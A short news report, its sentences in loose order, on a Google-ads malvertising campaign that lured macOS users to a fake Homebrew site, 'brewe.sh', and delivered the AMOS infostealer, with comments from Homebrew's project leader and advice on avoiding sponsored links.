To protect against similar attacks, users should verify website URLs and avoid installing software from unfamiliar sources.

A recent malvertising campaign has targeted macOS users by leading them to a fraudulent Homebrew site, 'brewe.sh', which closely resembles the legitimate site 'brew.sh'.

AMOS is a powerful infostealer designed to capture sensitive information, including login credentials and cryptocurrency details.

Security researchers have been warning about AMOS for several months, highlighting its subscription model that costs cybercriminals $1,000 per month.

Mike McQuaid, Homebrew's project leader, criticized Google for its inadequate oversight in preventing such scams, despite the removal of the malicious ad.

Victims of this scam are misled into executing a command that appears to install Homebrew, but instead, they inadvertently download the AMOS malware.

Users who clicked on the malicious ad were tricked into downloading AmosStealer, which is specifically designed for macOS.

Cybersecurity experts recommend that users avoid sponsored links and instead bookmark official websites to mitigate risks associated with such attacks.

Although Google has taken down the harmful ads, questions remain about how the threat actors managed to bypass Google's crawlers to display the fake Homebrew URL.

The campaign utilized Google advertisements to promote the fraudulent Homebrew site, taking advantage of the platform's vast reach.

Malwarebytes reported that thousands of Google customers worldwide might have been affected by this broader malvertising campaign.

Following the alert about the campaign, McQuaid confirmed that the malicious operation has been taken down, but he expressed concerns about the frequency of these incidents.